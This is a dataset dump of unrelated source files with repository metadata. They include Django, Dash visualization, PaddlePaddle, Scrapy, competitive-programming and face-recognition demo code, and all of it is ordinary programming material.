num_device_types=len(self.device_types))
def __str__(self):
description = ['iOS Simulator:']
description += map(str, self.runtimes)
description += map(str, self.device_types)
description += map(str, self.devices)
return '\n'.join(description)
| [
"daewoong.jang@navercorp.com"
] | daewoong.jang@navercorp.com |
5d34c6e9071fafae363483890c7e561f7ba6a451 | 2cadada30d1034dda64e2f1b08cb42b50d309bdf | /posts/migrations/0009_auto_20170829_1143.py | fe7568dedd79a82a0012d92ef6dd9411880b28ca | [] | no_license | sparsh0204/Ask-Lnmiit | 123d262023c39d9aacfe13a6d7a21996b418ac8e | 0b69f64ee2a23fc686df248d34f032c470c2d306 | refs/heads/master | 2022-12-11T03:25:26.368977 | 2020-01-13T07:29:28 | 2020-01-13T07:29:28 | 102,007,285 | 3 | 1 | null | 2022-12-08T00:42:12 | 2017-08-31T14:06:49 | HTML | UTF-8 | Python | false | false | 488 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-29 11:43
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('posts', '0008_auto_20170829_1141'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='image',
field=models.FileField(default='Images/No-img.jpg', null=True, upload_to=''),
),
]
| [
"sparshcode@gmail.com"
] | sparshcode@gmail.com |
2367b2c940668ee9e4ef5b53807358cb108491b3 | 42704268be9dc9c92f0c31d29e4c87ef5452862e | /add_strings_2.py | 72876c2346b38a93f526b9846af010bfc866fd6a | [] | no_license | djassal/python | 08af33e061cfbea8785d999ce88a768ae0ac6f1e | 4c902ee3c625dd7d8b486cd7821110e7f6a0d70b | refs/heads/master | 2020-06-25T07:35:27.449249 | 2019-07-28T05:44:50 | 2019-07-28T05:44:50 | 199,247,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 330 | py | domains = ["google","www.unix","oracle.com"]
for x in range(0, len(domains)):
if not "com" in domains[x] and not "www" in domains[x]:
print("www." + domains[x] + ".com")
elif not "www" in domains[x]:
print("www." + domains[x])
elif not "com" in domains[x]:
print(domains[x] + ".com")
| [
"noreply@github.com"
] | djassal.noreply@github.com |
71e949188be81367e2b96ae89c790224fd52a025 | ffc8eb0ba8b9ec73e896ffe9a8c2d594cd614e99 | /vis.py | bf35e0d577616f92e1dd812b664b36cbe5bcd90e | [] | no_license | nachmc3/2D_Vis | b67623471df99ac5c014c8059eb639ec2319f578 | 1a3b5a6bc10cecb06699b2fcba96a5ac2bb77d64 | refs/heads/master | 2023-04-16T19:32:31.908242 | 2021-04-25T16:52:22 | 2021-04-25T16:52:22 | 354,744,200 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,788 | py | import numpy as np
import pandas as pd
import glob
import plotly.graph_objects as go
import os
from jupyter_dash import JupyterDash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.io as pio
# Use the plain white Plotly theme for every figure created in this module.
pio.templates.default = "plotly_white"
class maps():
    """Interactive Dash viewer for 2D beating maps.

    On construction this loads every per-frequency matrix found under
    ``Fit_Data/<experiment>/test/<kind>/<point>.txt``, computes a global
    amplitude maximum per (experiment, kind) for normalization, builds a
    JupyterDash app with dropdown controls (experiment, data kind, beating
    frequency, normalization) and launches the server in "external" mode.

    Each loaded matrix is assumed to carry its axes in row 0 and column 0,
    with the amplitude data in ``matrix[1:, 1:]``.
    """

    def __init__(self):
        # --- data discovery -------------------------------------------------
        path0 = r"Fit_Data/"
        semi = "test/"
        folders = ["2D_AP2/", "2D_DC2/"]
        subfolders = ["2D_rdata/", "FT_camp/", "FT_camp_wtoint/", "FT_ramp/", "FT_iamp/"]
        # Candidate beating frequencies; most have no file on disk.
        scan_points = np.arange(-3000, +3000, 1)

        # Nested mapping: folder -> subfolder -> str(scan point) -> 2D array.
        # Built from the lists above so the keys can never drift out of sync
        # with `folders`/`subfolders`.
        self.data = {folder: {subfolder: {} for subfolder in subfolders}
                     for folder in folders}

        for folder in folders:
            for subfolder in subfolders:
                print("Loading {}, {} data".format(folder, subfolder))
                path1 = path0 + folder + semi + subfolder
                for point in scan_points:
                    try:
                        self.data[folder][subfolder][str(point)] = \
                            np.loadtxt(path1 + "{}.txt".format(point))
                    except OSError:
                        # Best effort: a missing file just means this
                        # frequency was not fitted for this data set.
                        pass

        # Global maximum amplitude per (folder, subfolder); every map of a
        # given kind is later scaled by this value so plots share one scale.
        # `default=0.0` avoids a startup ValueError when a directory yielded
        # no files (such a map would then render as all-NaN rather than
        # crashing the whole app at import time).
        self.maxpoints = {
            folder: {
                subfolder: max(
                    (matrix[1:, 1:].max()
                     for matrix in self.data[folder][subfolder].values()),
                    default=0.0)
                for subfolder in subfolders}
            for folder in folders}

        # Shared colorbar styling used by every contour figure.
        colorbar = dict(
            title='Amplitude',
            titleside='right',
            nticks=100,
            titlefont=dict(
                size=14,
                family='Arial, sans-serif'))

        # --- Dash app -------------------------------------------------------
        external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
        app = JupyterDash(__name__, external_stylesheets=external_stylesheets)
        app.title = "Beating maps analysis!"
        app.layout = html.Div(
            children=[
                html.Div(
                    children=[
                        html.H1(
                            children="Beating maps analysis", className="header-title"
                        ),
                        html.P(
                            children="Analyze the beating maps",
                            className="header-description",
                        ),
                    ],
                    className="header",
                ),
                html.Label('Experiment'),
                dcc.Dropdown(
                    id='folder',
                    options=[{'label': i, 'value': i} for i in folders],
                    value='2D_AP2/',
                    style={"width": "50%"}
                ),
                html.Label('Type of information'),
                dcc.Dropdown(
                    id='subfolder',
                    options=[{'label': i, 'value': i} for i in subfolders],
                    optionHeight=20,
                    value='FT_camp/',
                    style={"width": "50%"}
                ),
                html.Label('Frequency Beating'),
                dcc.Dropdown(
                    id='point',
                    options=[{'label': i, 'value': i} for i in self.data["2D_AP2/"]["FT_camp/"].keys()],
                    optionHeight=20,
                    value='-342',
                    style={"width": "50%"}
                ),
                html.Label('Normalize'),
                dcc.Dropdown(
                    id='norm',
                    options=[{'label': i, 'value': i} for i in ["Yes", "No"]],
                    optionHeight=20,
                    value='Yes',
                    style={"width": "50%"}
                ),
                html.Div(dcc.Graph(id='indicator-graphic'),
                ),
            ],
        )

        @app.callback(
            Output('indicator-graphic', 'figure'),
            Input('folder', 'value'),
            Input('subfolder', 'value'),
            Input('point', 'value'),
            Input('norm', 'value'))
        def update_graph(folder_name, subfolder_name, point_name, norm_name):
            """Redraw the contour map for the current dropdown selection."""
            temporal_data = self.data[folder_name][subfolder_name][point_name]
            zmax = self.maxpoints[folder_name][subfolder_name]
            # NOTE(review): the data are divided by the *global* maximum in
            # both branches; "Yes" only additionally pins the contour levels
            # to [0, 1] — confirm the "No" branch is meant to stay rescaled.
            contour_kwargs = dict(
                x=temporal_data[0, 1:],
                y=temporal_data[1:, 0],
                z=temporal_data[1:, 1:] / zmax,
                colorscale="Hot_r",
                colorbar=colorbar)
            if norm_name == "Yes":
                # Fixed levels 0..1 in steps of 0.1 so maps are comparable.
                contour_kwargs["contours"] = dict(start=0, end=1, size=0.1)
            # Falling through without `contours` (any non-"Yes" value) lets
            # Plotly auto-pick levels; the original raised NameError for
            # values other than "Yes"/"No".
            fig = go.Figure(data=go.Contour(**contour_kwargs))
            fig.update_layout(width=600, height=600)
            return fig

        app.run_server(mode="external", debug=False)
class integratedFT():
def __init__(self):
path0 = r"Fit_Data/"
semi = "test/"
folders = ["2D_AP2/", "2D_DC2/", "TG_AP1/", "TG_AP2/", "TG_DC1/", "TG_DC2/"]
scan_files = ["integrated_ft", "integrated_ft_cross_low", "integrated_ft_cross_upp"]
self.data = {"2D_AP2/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}}, "2D_DC2/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}},
"TG_AP1/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}}, "TG_AP2/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}},
"TG_DC1/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}}, "TG_DC2/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}}}
for folder in folders:
print("Loading {} data".format(folder))
path1 = path0 + folder + semi
for file in scan_files:
df = pd.read_csv(path1 + file + ".txt", header=None, sep = " ", names=["x", "y"])
df = df.sort_values(by=["x"], ascending=True)
df = df.reset_index(drop=True)
df["ynor"] = df["y"] - df["y"][0:50].min()
df["ynor"] = df["ynor"] / df["ynor"].max()
self.data[folder][file] = df
#RUN DASH
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = JupyterDash(__name__, external_stylesheets=external_stylesheets)
app.title = "Integrated FT analysis!"
app.layout = html.Div(
children=[
html.Div(
children=[
html.H1(
children="Integrated FT analysis", className="header-title"
),
html.P(
children="Analyze the fourier spectra",
className="header-description",
),
],
className="header",
),
html.Label('Experiment 1'),
dcc.Dropdown(
id='folder',
options=[{'label': i, 'value': i} for i in folders],
value='2D_DC2/',
style={"width": "50%"}
),
html.Label('Type of information 1'),
dcc.Dropdown(
id='file',
options=[{'label': i, 'value': i} for i in scan_files],
optionHeight=20,
value='integrated_ft_cross_low',
style={"width": "50%"}
),
html.Label('Normalize 1'),
dcc.Dropdown(
id='norm',
options=[{'label': i, 'value': i} for i in ["Yes", "No"]],
optionHeight=20,
value='Yes',
style={"width": "50%"}
),
html.Label('Experiment 2'),
dcc.Dropdown(
id='folder2',
options=[{'label': i, 'value': i} for i in folders],
value='2D_DC2/',
style={"width": "50%"}
),
html.Label('Type of information 2'),
dcc.Dropdown(
id='file2',
options=[{'label': i, 'value': i} for i in scan_files],
optionHeight=20,
value='integrated_ft_cross_upp',
style={"width": "50%"}
),
html.Label('Normalize 2'),
dcc.Dropdown(
id='norm2',
options=[{'label': i, 'value': i} for i in ["Yes", "No"]],
optionHeight=20,
value='Yes',
style={"width": "50%"}
),
html.Div(dcc.Graph(id='indicator-graphic'),
),
],
)
@app.callback(
Output('indicator-graphic', 'figure'),
Input('folder', 'value'),
Input('file', 'value'),
Input('norm', 'value'),
Input('folder2', 'value'),
Input('file2', 'value'),
Input('norm2', 'value'))
def update_graph(folder_name, file_name, norm_name, folder2_name, file2_name, norm2_name):
temporal_data = self.data[folder_name][file_name]
temporal_data2 = self.data[folder2_name][file2_name]
fig = go.Figure()
if norm_name == "Yes":
fig.add_trace(go.Scatter(x=temporal_data["x"], y=temporal_data["ynor"],
name="Exp: {} Curve: {}".format(folder2_name, file2_name),
line=dict(color='MediumSeaGreen')))
if norm_name == "No":
fig.add_trace(go.Scatter(x=temporal_data["x"], y=temporal_data["y"],
name="Exp: {} Curve: {}".format(folder2_name, file2_name),
line=dict(color='MediumSeaGreen')))
if norm2_name == "Yes":
fig.add_trace(go.Scatter(x=temporal_data2["x"], y=temporal_data2["ynor"],
name="Exp: {} Curve: {}".format(folder2_name, file2_name),
line=dict(color='Tomato')))
if norm2_name == "No":
fig.add_trace(go.Scatter(x=temporal_data2["x"], y=temporal_data2["y"],
name="Exp: {} Curve: {}".format(folder2_name, file2_name),
line=dict(color='Tomato')))
fig.update_layout(width=1200, height=600)
return fig
app.run_server(mode="external", debug=False)
| [
"ignaciomc18@gmail.com"
] | ignaciomc18@gmail.com |
54229a86e150c2add9cea94da86d074a6cb921f2 | 72008ae16bd4f8ec0862d1bcce06c66ba24a11dd | /codecheftest.py | 60481d69266655862bd95a6c03a7498f8ed4a534 | [] | no_license | Tarique-web/CODECHEF_CONTEST_SOLUTION | 67fb90c31a8ee6f7f2366e2d76f1c0c806465889 | 594cdc4d317ea12c72ce70135c75b587b7abe7a8 | refs/heads/master | 2022-12-27T14:53:07.949412 | 2020-09-29T04:15:13 | 2020-09-29T04:15:13 | 299,498,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,427 | py | # -----------------------SMART PHONE----------------------
test_cases=int(input())
budget=[]
for i in range(test_cases):
budget.append(int(input()))
budget.sort()
budget_len=len(budget)
budget_max=[]
for j in range(budget_len):
budget_max.append((budget[j]*(budget_len)))
budget_len-=1
max1=budget_max[0]
for l in range(len(budget_max)):
if budget_max[l]>=max1:
max1=budget_max[l]
print(max1)
# ----------------------------Grade The Steel-------------------------------------
TestCase=int(input())
for i in range(TestCase):
H,C,T=map(str,input().split())
H=int(H)
C=float(C)
T=int(T)
if H>50 and C<0.7 and T>5600:
grade=10
elif H>50 and C<0.7:
grade=9
elif C<0.7 and T>5600:
grade=8
elif H>50 and T>5600:
grade=7
elif H>50 or C<0.7 or T>5600:
grade=6
else:
grade=5
print(grade)
# -----------------------Chef and Remissness --------------------
TestCase=int(input())
for i in range(TestCase):
A,B=map(int,input().split())
if A>B:
print(A,A+B)
else:
print(B,A+B)
# --------------------------Lucky Fours-----------------------
TestCase=int(input())
for i in range(TestCase):
N=input()
counter=0
for j in range(0,len(N)):
if N[j]=="4":
counter+=1
print(counter)
# ---------------------------------------------------------TEST DONE BY 28SEP2020---------------------------------------------------------------------- | [
"noreply@github.com"
] | Tarique-web.noreply@github.com |
b71088a81e42ad63fdfe6b910308c7bb658194e4 | 0b4d7da0bb47fd94c2590999e59414934411e176 | /venv/Scripts/easy_install-script.py | 5aa1e510ba8baa011f381e864b0eb921d133e172 | [] | no_license | toddAwesome/UWB-postion-analysis | e308299a480893263a85637b57ead59fb5d4c4fa | 622f940f9472a074ef7b5d45e5945df94e8456c6 | refs/heads/master | 2022-12-10T15:19:14.502856 | 2018-08-22T15:17:37 | 2018-08-22T15:17:37 | 145,459,844 | 4 | 0 | null | 2022-12-08T02:22:48 | 2018-08-20T19:10:43 | Python | UTF-8 | Python | false | false | 459 | py | #!D:\pyCharm-workspace\IndoorPositionDataAnalysis\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==28.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==28.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==28.8.0', 'console_scripts', 'easy_install')()
)
| [
"toddrobb11@gmail.com"
] | toddrobb11@gmail.com |
4f8e9dcd97ab00a31aed0513093605e614165a2c | 23f33b344828717f3e7b5b85bd45d69b5ba0b1ce | /python/paddle/fluid/dygraph/varbase_patch_methods.py | 10f448fe8075cb551c29e6f1eeb27cea0e29c435 | [
"Apache-2.0"
] | permissive | abbasidaniyal/Paddle | 2f5ef4dadbbedb66c6ac7c2e3c82ffad0d2ef000 | c3527f5526ee96398760cbef11d7de48f41fe998 | refs/heads/develop | 2020-12-02T05:12:22.353302 | 2019-12-30T06:38:44 | 2019-12-30T06:38:44 | 230,898,990 | 0 | 0 | Apache-2.0 | 2020-06-11T15:12:33 | 2019-12-30T10:53:00 | null | UTF-8 | Python | false | false | 10,440 | py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .. import framework
from .. import core
from . import BackwardStrategy
from ..framework import Variable, _getitem_impl_
from .. import unique_name
import numpy as np
from .math_op_patch import monkey_patch_math_varbase
def monkey_patch_varbase():
# TODO(jiabin): move this to cplusplus end if we find some performance issue on it
@framework.dygraph_only
def set_value(self, value):
"""
**Notes**:
**This API is ONLY avaliable in Dygraph mode**
Set a new value for this Variable.
Args:
value (Variable|np.ndarray): the new value.
Examples:
.. code-block:: python
import paddle.fluid as fluid
from paddle.fluid.dygraph.base import to_variable
from paddle.fluid.dygraph import FC
import numpy as np
data = np.ones([3, 32, 32], dtype='float32')
with fluid.dygraph.guard():
fc = fluid.dygraph.FC("fc", 4)
t = to_variable(data)
fc(t) # call with default weight
custom_weight = np.random.randn(1024, 4).astype("float32")
fc.weight.set_value(custom_weight) # change existing weight
out = fc(t) # call with different weight
"""
assert isinstance(value, (np.ndarray, core.VarBase)), \
"Variable set_value function, arguments type only support Variable, numpy, VarBase"
value_np = value
if isinstance(value, core.VarBase):
value_np = value.numpy()
self_tensor_np = self.numpy()
assert self_tensor_np.shape == value_np.shape, \
"Variable Shape not match, Variable [ {} ] need tensor with shape {} but load set tensor with shape {}".format(
self.name, self_tensor_np.shape, value_np.shape)
assert self_tensor_np.dtype == value_np.dtype, \
"Variable dtype not match, Variable [ {} ] need tensor with dtype {} but load tensor with dtype {}".format(
self.name, self_tensor_np.dtype, value_np.dtype)
self.value().get_tensor().set(value_np,
framework._current_expected_place())
@framework.dygraph_only
def backward(self, backward_strategy=None):
"""
**Notes**:
**This API is ONLY avaliable in Dygraph mode**
Run backward of current Graph which starts from current Variable
Args:
backward_strategy( :ref:`api_fluid_dygraph_BackwardStrategy` ): The Backward Strategy to run backward
Returns:
NoneType: None
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
x = np.ones([2, 2], np.float32)
with fluid.dygraph.guard():
inputs2 = []
for _ in range(10):
tmp = fluid.dygraph.base.to_variable(x)
# if we don't set tmp's stop_gradient as False then, all path to loss will has no gradient since
# there is no one need gradient on it.
tmp.stop_gradient=False
inputs2.append(tmp)
ret2 = fluid.layers.sums(inputs2)
loss2 = fluid.layers.reduce_sum(ret2)
backward_strategy = fluid.dygraph.BackwardStrategy()
backward_strategy.sort_sum_gradient = True
loss2.backward(backward_strategy)
"""
if framework.in_dygraph_mode():
if backward_strategy is None:
backward_strategy = BackwardStrategy()
backward_strategy.sort_sum_gradient = False
self._run_backward(backward_strategy, framework._dygraph_tracer())
else:
raise ValueError(
"Variable.backward() is only avaliable in DyGraph mode")
@framework.dygraph_only
def gradient(self):
"""
**Notes**:
**This API is ONLY avaliable in Dygraph mode**
Get the Gradient of Current Variable
Returns:
ndarray: Numpy value of the gradient of current Variable
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
x = np.ones([2, 2], np.float32)
with fluid.dygraph.guard():
inputs2 = []
for _ in range(10):
tmp = fluid.dygraph.base.to_variable(x)
tmp.stop_gradient=False
inputs2.append(tmp)
ret2 = fluid.layers.sums(inputs2)
loss2 = fluid.layers.reduce_sum(ret2)
backward_strategy = fluid.dygraph.BackwardStrategy()
backward_strategy.sort_sum_gradient = True
loss2.backward(backward_strategy)
print(loss2.gradient())
"""
if self._grad_ivar() is None:
raise ValueError(
"%s has no grad, Please set Variable.stop_gradient=False, or "
"check if this is the first and only variable need grad, if so, please set its pre-Variable's "
"stop_gradient=False, to make sure it has gradient " %
self.name)
new_ivar = self._grad_ivar()._copy_to(core.CPUPlace(), True)
if self._grad_ivar().type == core.VarDesc.VarType.SELECTED_ROWS:
return (np.array(new_ivar.value().get_selected_rows().get_tensor()),
np.array(new_ivar.value().get_selected_rows().rows()))
else:
return np.array(new_ivar.value().get_tensor())
def __str__(self):
return self.to_string(True)
@property
def block(self):
return framework.default_main_program().global_block()
def to_string(self, throw_on_error, with_details=False):
"""
Get debug string.
Args:
throw_on_error (bool): True if raise an exception when self is not initialized.
with_details (bool): more details about variables and parameters (e.g. trainable, optimize_attr, ...) will be printed when with_details is True. Default value is False;
Returns:
str: The debug string.
Examples:
.. code-block:: python
import paddle.fluid as fluid
cur_program = fluid.Program()
cur_block = cur_program.current_block()
new_variable = cur_block.create_var(name="X",
shape=[-1, 23, 48],
dtype='float32')
print(new_variable.to_string(True))
print("=============with detail===============")
print(new_variable.to_string(True, True))
"""
if framework.in_dygraph_mode():
# TODO(panyx0718): add more dygraph debug info.
tensor = self.value().get_tensor()
if tensor._is_initialized():
return 'name %s, dtype: %s shape: %s %s' % (
self.name, self.dtype, self.shape, str(tensor))
else:
return 'name %s, shape: %s, not inited' % (self.name,
self.shape)
def __getitem__(self, item):
if not isinstance(item, tuple):
item = [item]
decrease_axis = []
slice_axis = []
slice_start = []
slice_end = []
reverse_axis = []
for dim, slice_item in enumerate(item):
if isinstance(slice_item, slice):
start = slice_item.start
end = slice_item.stop
step = slice_item.step if slice_item.step else 1
assert (step == 1 or step == -1)
if step == -1:
reverse_axis.append(dim)
assert (start is None and end is None)
if start is None and end is None:
continue
if start is None:
start = 0
if end is None:
end = 10000000
slice_axis.append(dim)
slice_start.append(start)
slice_end.append(end)
else:
# int
decrease_axis.append(dim)
slice_axis.append(dim)
slice_start.append(slice_item)
slice_end.append(slice_item + 1
if slice_item != -1 else 10000000)
out = self
if len(slice_axis) > 0:
# append slice_op here
inputs = {'Input': [out]}
attrs = {
'axes': slice_axis,
'starts': slice_start,
'ends': slice_end,
'decrease_axis': decrease_axis
}
outs = core.ops.slice(inputs, attrs)
out = outs['Out'][0]
if len(reverse_axis) > 0:
inputs = {'X': [out]}
attrs = {'axis': reverse_axis}
outs = core.ops.reverse(inputs, attrs)
out = outs['Out'][0]
return out
for method_name, method in (("set_value", set_value), ("block", block),
("backward", backward), ("gradient", gradient),
("__str__", __str__), ("to_string", to_string),
("__getitem__", __getitem__)):
setattr(core.VarBase, method_name, method)
# patch math methods for varbase
monkey_patch_math_varbase()
| [
"noreply@github.com"
] | abbasidaniyal.noreply@github.com |
5143a8db1daaaf86a81a2b7dc43ea8d0137537fd | 9ae6a45b4f5534243248bf5cd2bdfea6d932a857 | /eshop/shop/search_view.py | d3b2b2fc2a9d9e9e8be36355366b9af70377afb4 | [] | no_license | derekCRO/djangoforeshop | 05f5da66c5ab2c43c29c5dc9b899db099406e170 | 824a57d00fa63b21fe52fc0ab839de57a84a4efa | refs/heads/master | 2023-01-19T13:36:14.683403 | 2018-08-09T14:58:41 | 2018-08-09T14:58:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/7/10 18:37
# @Author : zhl
# @Site :
# @File : search_view.py
# @Software: PyCharm
from haystack.generic_views import SearchView
class MySearchView(SearchView):
# def get_queryset(self):
# # print("get_queryset")
# # queryset = super(MySearchView, self).get_queryset()
# # # further filter queryset based on some set of criteria
# # return queryset.filter(goods_price__gt='100')
def get_context_data(self, *args, **kwargs):
print("get_context_data")
context = super(MySearchView, self).get_context_data(*args, **kwargs)
# context['haha'] = '1'
return context | [
"tiop08317@gmail.com"
] | tiop08317@gmail.com |
9357a8f90907e0020b4d6950974fa58909570709 | 260ff9e3b9dfeb208c78499914491b4e5125a025 | /xianc/wikitravel/pipelines.py | e45fe029956518e0fde52e2c8bc3f353fd1b327c | [
"MIT",
"LicenseRef-scancode-other-permissive"
] | permissive | Soni96pl/Xian-C | 51284a6d4f316eb34c402dbce5a91c4905c1b2ed | 16170ae9ecc0d2a49c57c7833e538c18a1ade216 | refs/heads/master | 2021-06-09T21:27:32.941546 | 2016-11-27T11:33:33 | 2016-11-27T11:33:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 340 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
class WikitravelPipeline(object):
def process_item(self, item, spider):
item['db']['story'] = item['story']
item['db'].save()
| [
"jakub@chronow.ski"
] | jakub@chronow.ski |
bcf0008e7c32cc0962365c810680c301ab8abedb | 58497ad5ed78d82a2519faeaecbec724fb7d4f60 | /mfscrm/urls.py | 91c49b2982226924dc96662772a5b0c41a7aa6d3 | [] | no_license | harry2491/MSD-Assignment-1-Part-B | 94c2d092c1a7f5428e17f4eeaf812a26a102cee9 | 3593f530014809a6105e039ad7353d51d61eae01 | refs/heads/master | 2020-03-28T22:08:09.320251 | 2018-09-20T16:52:01 | 2018-09-20T16:52:01 | 149,207,245 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | """mfscrm URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, re_path
from django.contrib import admin
from django.urls import path, include
from django.conf.urls import url, include
from django.contrib.auth.views import LoginView, LogoutView
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('crm.urls')),
re_path(r'^accounts/login/$', LoginView.as_view(template_name='registration/login.html'), name="login"),
re_path(r'^accounts/logout/$', LogoutView.as_view(), LogoutView.next_page, name="logout"),
]
| [
"hharwinderkaur@unomaha.edu"
] | hharwinderkaur@unomaha.edu |
f64a006d037948ac99c6973eceedbf33367de8e5 | 87716f71b04a28f9e7828193b701a617f54959ba | /Android-All researched document and past demo required by client - not used/Python demo/Capstone_Face.py | 1a8e2f6ab51b8e29b4b943447bbaa171cf9ab66b | [
"Apache-2.0"
] | permissive | CanTri/CheckingAttendent | 935b5b37df074c83313a400be36268cf79ff30e2 | d3f946cc435de3b45952b287664750bebac5f55d | refs/heads/master | 2021-03-21T23:56:58.914605 | 2018-04-20T15:13:15 | 2018-04-20T15:13:15 | 109,378,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,880 | py | import face_recognition
import cv2
import copy
class Face:
def __init__(self,person,file):
image = face_recognition.load_image_file(file)
self.encoding = face_recognition.face_encodings(image)[0]
self.person = person
self.file = file
def nothing(x):
pass
#obama_image = face_recognition.load_image_file("obama.jpg")
#obama_face_encoding = face_recognition.face_encodings(obama_image)[0]
#a = Face("Obama","obama.jpg")
#hiep_image = face_recognition.load_image_file("TungHiep.jpg")
#hiep_face_encoding = face_recognition.face_encodings(hiep_image)[0]
#b = Face("Hiep","TungHiep.jpg")
# Initialize some variables
face_locations = []
face_encodings = []
check_face_encodings =[]
face_names = []
process_this_frame = True
check_face_encodings.append(Face("Obama","obama.jpg"))
check_face_encodings.append(Face("Hiep","TungHiep.jpg"))
check_face_encodings.append(Face("America","chris.jpg"))
check_face_encodings.append(Face("Hawk","hawk.jpg"))
check_face_encodings.append(Face("Hulk","hulk.jpg"))
check_face_encodings.append(Face("Iron","iron.jpg"))
check_face_encodings.append(Face("Widow","widow.jpg"))
check_face_encodings.append(Face("Tam","Tam.jpg"))
check_face_encodings.append(Face("Khoi","Khoi.jpg"))
check_face_encodings.append(Face("Tri","Tri.jpg"))
# Grab a single frame of video
frame = cv2.imread(raw_input("Input file name: "))
if frame is None:
webcam = cv2.VideoCapture(0)
while True:
s, frame = webcam.read()
cv2.imshow('Video', frame)
if cv2.waitKey(1) != -1:
#cv2.imwrite("testing.jpg",frame)
break
myimage = copy.deepcopy(frame)
cv2.namedWindow("Video",cv2.WINDOW_NORMAL)
cv2.createTrackbar("Correctness", "Video", 0, 9,nothing)
cv2.createTrackbar("Small Face", "Video", 0, 5,nothing)
temp = -1
temp2 = -1
while True:
value = (cv2.getTrackbarPos("Correctness", "Video"))/10.0
if (value == 0):
value = 0.1
face_value = cv2.getTrackbarPos("Small Face", "Video")
if (face_value == 0):
face_value = 1
if ((value != temp and value > 0) or (face_value != temp2 and face_value > 0)):
frame = copy.deepcopy(myimage)
# Resize frame of video to 1/4 size for faster face recognition processing
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
face_locations = face_recognition.face_locations(small_frame,face_value)
print "Face detected at location: " + str(face_locations)
face_encodings = face_recognition.face_encodings(small_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
print ("------Checking------")
name = "Unknown"
for i in range(len(check_face_encodings)):
match = face_recognition.compare_faces([check_face_encodings[i].encoding], face_encoding,value)
if match[0]:
name = check_face_encodings[i].person
print "Checking with " + check_face_encodings[i].person + " Result: " + str(match)
face_names.append(name)
# Display the results
for (top, right, bottom, left), name in zip(face_locations, face_names):
top *= 4
right *= 4
bottom *= 4
left *= 4
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
temp = value
temp2 = face_value
cv2.imshow("Video", frame)
if cv2.waitKey(1) == 27: # press ESC to close window
cv2.destroyAllWindows()
break
cv2.waitKey(0)
# Release handle to the webcam
cv2.destroyAllWindows()
| [
"tbthiep@apcs.vn"
] | tbthiep@apcs.vn |
e2749e0d9cb867ef80f5ae4149656804e1cad032 | d17cb92b16c2cf32d6d8a69867a352052d87910d | /PYModules/GorGon/KLWrapper/KLStruct.py | 897a56e8ae0baaa8d6f288d60f583bc7e55624de | [] | no_license | sbertout/GorGon | cd420babe3f63eccc63819e83c7d0d1229069b15 | cf95dfc5375de251cf859d96eb44bb2d8375f592 | refs/heads/master | 2021-01-21T13:57:13.289976 | 2017-08-04T23:07:35 | 2017-08-04T23:07:35 | 91,816,621 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,800 | py | from KLFunction import KLFunction
from KLMember import KLMember
class KLStruct:
def __init__(self, name, members=None):
self.__name = name
self.__members = []
if members is not None:
self.setMembers(members)
self.__constructors = []
self.__hasDestructor = False
self.__parents = []
self.__getters = []
self.__setters = []
self.__methods = []
self.__operators = []
def getName(self):
return self.__name
def _setHasDestructor(self, b):
self.__hasDestructor = b
